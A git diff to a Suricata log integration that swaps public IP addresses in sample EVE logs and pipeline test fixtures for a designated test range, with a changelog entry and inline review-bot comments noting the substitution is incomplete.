:["151.101.130.217","151.101.194.217","151.101.2.217","151.101.66.217"],"CNAME":["dualstack.r2.shared.global.fastly.net"]}}} -{"timestamp":"2019-08-22T23:48:48.902685+0000","flow_id":2130691028471842,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":41979,"proto":"UDP","dns":{"version":2,"type":"answer","id":4210,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"AAAA","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":299,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0600:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0000:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0200:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0400:0000:0000:0000:0000:0729"}],"grouped":{"AAAA":["2a04:4e42:0600
:0000:0000:0000:0000:0729","2a04:4e42:0000:0000:0000:0000:0000:0729","2a04:4e42:0200:0000:0000:0000:0000:0729","2a04:4e42:0400:0000:0000:0000:0000:0729"],"CNAME":["dualstack.r2.shared.global.fastly.net"]}}} +{"timestamp":"2019-08-22T23:48:48.901548+0000","flow_id":40074894954311,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":50720,"proto":"UDP","dns":{"version":2,"type":"answer","id":60273,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"A","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":270,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"}],"grouped":{"A":["175.16.199.1","175.16.199.1","175.16.199.1","175.16.199.1"],"CNAME":["dualstack.r2.shared.global.fastly.net"]}}} 
+{"timestamp":"2019-08-22T23:48:48.902685+0000","flow_id":2130691028471842,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":41979,"proto":"UDP","dns":{"version":2,"type":"answer","id":4210,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"AAAA","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":299,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0200:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0400:0000:0000:0000:0000:0729"}],"grouped":{"AAAA":["2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","2a04:4e42:0200:0000:0000:0000:0000:0729","2a04:4e42:0400:0000:0000:0000:0000:0729"],"CNAME":["dualstack.r2.shared.global.fastly.net"]}}} {"timestamp":"2019-08-23T01:22:31.812655+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":44773,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":28329,"rrname":"www.yahoo.com","rrtype":"A","tx_id":0}} {"timestamp":"2019-08-23T01:22:31.812828+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":55246,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":7050,"rrname":"www.yahoo.com","rrtype":"AAAA","tx_id":0}} 
{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.yahoo.com","rrtype":"CNAME","ttl":1315,"rdata":"atsv2-fp-shed.wg1.b.yahoo.com"}}
-{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"98.138.219.232"}}
-{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"98.138.219.231"}}
-{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"72.30.35.10"}}
-{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"72.30.35.9"}}
+{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"175.16.199.1"}}
+{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"175.16.199.1"}}
+{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"175.16.199.1"}}
+{"timestamp":"2019-08-23T01:22:31.846575+0000","flow_id":814378410010223,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":44773,"proto":"UDP","dns":{"type":"answer","id":28329,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"A","ttl":15,"rdata":"175.16.199.1"}}
 {"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.yahoo.com","rrtype":"CNAME","ttl":1268,"rdata":"atsv2-fp-shed.wg1.b.yahoo.com"}}
-{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2001:4998:0058:1836:0000:0000:0000:0010"}}
-{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2001:4998:0044:041d:0000:0000:0000:0003"}}
-{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2001:4998:0058:1836:0000:0000:0000:0011"}}
-{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2001:4998:0044:041d:0000:0000:0000:0004"}}
+{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}}
+{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}}
+{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}}
+{"timestamp":"2019-08-23T01:22:31.847379+0000","flow_id":1887239765714716,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":55246,"proto":"UDP","dns":{"type":"answer","id":7050,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"atsv2-fp-shed.wg1.b.yahoo.com","rrtype":"AAAA","ttl":53,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}}
 {"timestamp":"2019-08-23T02:03:36.578089+0000","flow_id":2181951993205289,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":48288,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":9104,"rrname":"www.elastic.co","rrtype":"A","tx_id":0}}
{"timestamp":"2019-08-23T02:03:36.578262+0000","flow_id":928596784370390,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":59203,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12859,"rrname":"www.elastic.co","rrtype":"AAAA","tx_id":0}} -{"timestamp":"2019-08-23T02:03:36.619381+0000","flow_id":2181951993205289,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":48288,"proto":"UDP","dns":{"version":2,"type":"answer","id":9104,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"A","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":150,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.194.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.2.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.66.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.130.217"}]}} 
-{"timestamp":"2019-08-23T02:03:36.626559+0000","flow_id":928596784370390,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":59203,"proto":"UDP","dns":{"version":2,"type":"answer","id":12859,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"AAAA","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":269,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0000:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0200:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0400:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0600:0000:0000:0000:0000:0729"}]}} +{"timestamp":"2019-08-23T02:03:36.619381+0000","flow_id":2181951993205289,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":48288,"proto":"UDP","dns":{"version":2,"type":"answer","id":9104,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"A","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":150,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"175.16.199.1"}]}} 
+{"timestamp":"2019-08-23T02:03:36.626559+0000","flow_id":928596784370390,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":59203,"proto":"UDP","dns":{"version":2,"type":"answer","id":12859,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"AAAA","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":269,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0200:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0400:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}]}} diff --git a/packages/suricata/_dev/deploy/docker/sample_logs/eve-small.ndjson b/packages/suricata/_dev/deploy/docker/sample_logs/eve-small.ndjson index 45163a617e9..bba9cb3c87f 100644 --- a/packages/suricata/_dev/deploy/docker/sample_logs/eve-small.ndjson +++ b/packages/suricata/_dev/deploy/docker/sample_logs/eve-small.ndjson 
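Review bot: The substitution in this hunk is inconsistent on the new side: every A answer for `dualstack.r2.shared.global.fastly.net` becomes `175.16.199.1`, so `"grouped":{"A":["175.16.199.1","175.16.199.1","175.16.199.1","175.16.199.1"]}` now repeats one address four times, while the AAAA answers in the same records mix `2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6` with the untouched `2a04:4e42:0200:0000:0000:0000:0000:0729` and `2a04:4e42:0400:0000:0000:0000:0000:0729`. If the goal is that every public address in the sample comes from the supported subset, the remaining `2a04:4e42:*` entries should be replaced too; if distinct answers are wanted, use distinct addresses from that subset rather than one repeated value, since a four-way duplicate answer set no longer resembles real resolver output and hides any deduplication bug in the pipeline. This is a docker sample log rather than a pipeline expectation, so the inconsistency affects readability of the sample rather than a test assertion.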
@@ -2,7 +2,7 @@ {"timestamp":"2018-07-05T15:07:20.910626-0400","flow_id":904992230150281,"in_iface":"en0","event_type":"alert","src_ip":"192.168.86.85","src_port":55641,"dest_ip":"192.168.156.70","dest_port":443,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2024833,"rev":3,"signature":"ET POLICY Observed IP Lookup Domain (l2 .io in TLS SNI)","category":"Potential Corporate Privacy Violation","severity":1},"tls":{"session_resumed":true,"sni":"l2.io","version":"TLS 1.2"},"app_proto":"tls","flow":{"pkts_toserver":4,"pkts_toclient":3,"bytes_toserver":793,"bytes_toclient":343,"start":"2018-07-05T15:07:19.659593-0400"}} {"timestamp":"2018-07-05T15:43:47.690014-0400","flow_id":2115002772430095,"in_iface":"en0","event_type":"http","src_ip":"192.168.86.85","src_port":56119,"dest_ip":"192.168.86.28","dest_port":63963,"proto":"TCP","tx_id":0,"http":{"hostname":"192.168.86.28","url":"\/dd.xml","http_user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/67.0.3396.99 Safari\/537.36","http_content_type":"text\/xml","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1155}} {"timestamp":"2018-07-05T15:44:33.222441-0400","flow_id":2211411903323127,"in_iface":"en0","event_type":"fileinfo","src_ip":"192.168.86.28","src_port":8008,"dest_ip":"192.168.86.85","dest_port":56118,"proto":"TCP","http":{"hostname":"192.168.86.28","url":"\/ssdp\/device-desc.xml","http_user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/67.0.3396.99 
Safari\/537.36","http_content_type":"application\/xml","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1071},"app_proto":"http","fileinfo":{"filename":"\/ssdp\/device-desc.xml","gaps":false,"state":"CLOSED","md5":"427b7337ff37eeb24d74f47d8e04cf21","sha1":"313573490192c685e9e53abef25453ed0d5e2aee","sha256":"f610428ebddf6f8cf9e39322e672583c45fcdcf885efad0ab48fd53a3dfc2c4b","stored":false,"size":1071,"tx_id":0}}
-{"timestamp":"2018-07-05T15:51:20.213418-0400","flow_id":1684780223079543,"in_iface":"en0","event_type":"dns","src_ip":"192.168.86.1","src_port":53,"dest_ip":"192.168.86.85","dest_port":39464,"proto":"UDP","dns":{"type":"answer","id":12308,"rcode":"NOERROR","rrname":"clients.l.google.com","rrtype":"A","ttl":299,"rdata":"172.217.13.110"}}
+{"timestamp":"2018-07-05T15:51:20.213418-0400","flow_id":1684780223079543,"in_iface":"en0","event_type":"dns","src_ip":"192.168.86.1","src_port":53,"dest_ip":"192.168.86.85","dest_port":39464,"proto":"UDP","dns":{"type":"answer","id":12308,"rcode":"NOERROR","rrname":"clients.l.google.com","rrtype":"A","ttl":299,"rdata":"175.16.199.1"}}
{"timestamp":"2018-07-05T15:51:23.009510-0400","event_type":"stats","stats":{"uptime":5400,"capture":{"kernel_packets":430313,"kernel_drops":0,"kernel_ifdrops":0},"decoder":{"pkts":430313,"bytes":335138381,"invalid":2,"ipv4":425873,"ipv6":3785,"ethernet":430313,"raw":0,"null":0,"sll":0,"tcp":370093,"udp":58337,"sctp":0,"icmpv4":186,"icmpv6":1019,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"ieee8021ah":0,"teredo":1,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":778,"max_pkt_size":1514,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"tcp":1113,"udp":1881,"icmpv4":0,"icmpv6":677,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":11537312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":842,"ssn_memcap_drop":0,"pseudo":0,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":1138,"synack":656,"rst":1165,"segment_memcap_drop":0,"stream_depth_reached":63,"reassembly_gap":0,"overlap":5979,"overlap_diff_data":0,"insert_data_normal_fail":0,"insert_data_overlap_fail":0,"insert_list_fail":0,"memuse":4587520,"reassembly_memuse":768000},"detect":{"alert":2},"app_layer":{"flow":{"http":22,"ftp":0,"smtp":0,"tls":560,"ssh":4,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":2,"dcerpc_udp":0,"dns_udp":762,"failed_udp":1119},"tx":{"http":25,"ftp":0,"smtp":0,"tls":0,"ssh":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"dcerpc_udp":0,"dns_udp":762}},"flow_mgr":{"closed_pruned":729,"new_pruned":1879,"est_pruned":975,"bypassed_pruned":0,"flows_checked":8,"flows_notimeout":8,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65530,"rows_empty":0,"rows_busy":0,"rows_maxlen":2},"file_store":{"open_files":0},"dns":{"memuse":7749,"memcap_state":0,"memcap_global":0},"http":{"memuse":17861,"memcap":0}}} 
{"timestamp":"2018-07-05T15:51:50.666597-0400","flow_id":89751777876473,"in_iface":"en0","event_type":"tls","src_ip":"192.168.86.85","src_port":56187,"dest_ip":"17.142.164.13","dest_port":443,"proto":"TCP","tls":{"subject":"CN=*.icloud.com, OU=management:idms.group.506364, O=Apple Inc., ST=California, C=US","issuerdn":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","serial":"5C:9C:E1:09:78:87:F8:07","fingerprint":"6a:ff:ac:a6:5f:8a:05:e7:a9:8c:76:29:b9:08:c7:69:ad:dc:72:47","sni":"p33-btmmdns.icloud.com.","version":"TLS 1.2","notbefore":"2017-02-27T17:54:31","notafter":"2019-03-29T17:54:31"}} {"timestamp":"2018-07-05T15:51:54.001329-0400","flow_id":1828507008887644,"event_type":"flow","src_ip":"fe80:0000:0000:0000:fada:0cff:fedc:87f1","src_port":546,"dest_ip":"ff02:0000:0000:0000:0000:0000:0001:0002","dest_port":547,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":0,"bytes_toserver":110,"bytes_toclient":0,"start":"2018-07-05T15:51:23.453468-0400","end":"2018-07-05T15:51:23.453468-0400","age":0,"state":"new","reason":"timeout","alerted":false}} diff --git a/packages/suricata/changelog.yml b/packages/suricata/changelog.yml index 681df454545..98f101aab26 100644 --- a/packages/suricata/changelog.yml +++ b/packages/suricata/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.3.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log index 15d880f0630..3e1f35cb9e5 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log 
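Review bot: The hunk replaces only the DNS `rdata` of the `clients.l.google.com` answer, while the TLS record two lines below it still carries the public address `"dest_ip":"17.142.164.13"` (the `*.icloud.com` certificate event) on the new side. If the intent of this PR is that every public IP in the sample logs comes from the supported subset, that value should be swapped as well, e.g. `"dest_ip":"175.16.199.1"`; if only DNS answer data was meant to change, a short note in the changelog entry would make the scope explicit. The other addresses in this hunk are private (`192.168.86.x`) or link-local/multicast IPv6 and are unaffected either way.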
@@ -1 +1 @@ -{"timestamp":"2021-01-27T01:28:11.488362+0100","flow_id":1805461738637437,"in_iface":"enp6s0","event_type":"alert","src_ip":"52.222.141.99","src_port":80,"dest_ip":"10.31.64.240","dest_port":47592,"proto":"TCP","ether":{"src_mac":"00:03:2d:3f:e5:63","dest_mac":"00:1b:17:00:01:18"},"alert":{"action":"allowed","gid":1,"signature_id":2100498,"rev":7,"signature":"GPL ATTACK_RESPONSE id check returned root","category":"Potentially Bad Traffic","severity":2,"metadata":{"created_at":["2010_09_23"],"updated_at":["2010_09_23"]}},"http":{"hostname":"testmynids.org","url":"/uid/index.html","http_user_agent":"curl/7.58.0","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":200,"length":39},"app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":496,"bytes_toclient":876,"start":"2021-01-22T23:28:38.673917+0100"}} +{"timestamp":"2021-01-27T01:28:11.488362+0100","flow_id":1805461738637437,"in_iface":"enp6s0","event_type":"alert","src_ip":"175.16.199.1","src_port":80,"dest_ip":"10.31.64.240","dest_port":47592,"proto":"TCP","ether":{"src_mac":"00:03:2d:3f:e5:63","dest_mac":"00:1b:17:00:01:18"},"alert":{"action":"allowed","gid":1,"signature_id":2100498,"rev":7,"signature":"GPL ATTACK_RESPONSE id check returned root","category":"Potentially Bad Traffic","severity":2,"metadata":{"created_at":["2010_09_23"],"updated_at":["2010_09_23"]}},"http":{"hostname":"testmynids.org","url":"/uid/index.html","http_user_agent":"curl/7.58.0","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":200,"length":39},"app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":496,"bytes_toclient":876,"start":"2021-01-22T23:28:38.673917+0100"}} diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log-expected.json b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log-expected.json index 739a7835709..f4d460235d9 100644 
--- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log-expected.json +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log-expected.json @@ -16,21 +16,26 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -122.3451, - "lat": 47.6348 + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "52.222.141.99", + "address": "175.16.199.1", "port": 80, "bytes": 496, - "ip": "52.222.141.99", + "ip": "175.16.199.1", "mac": 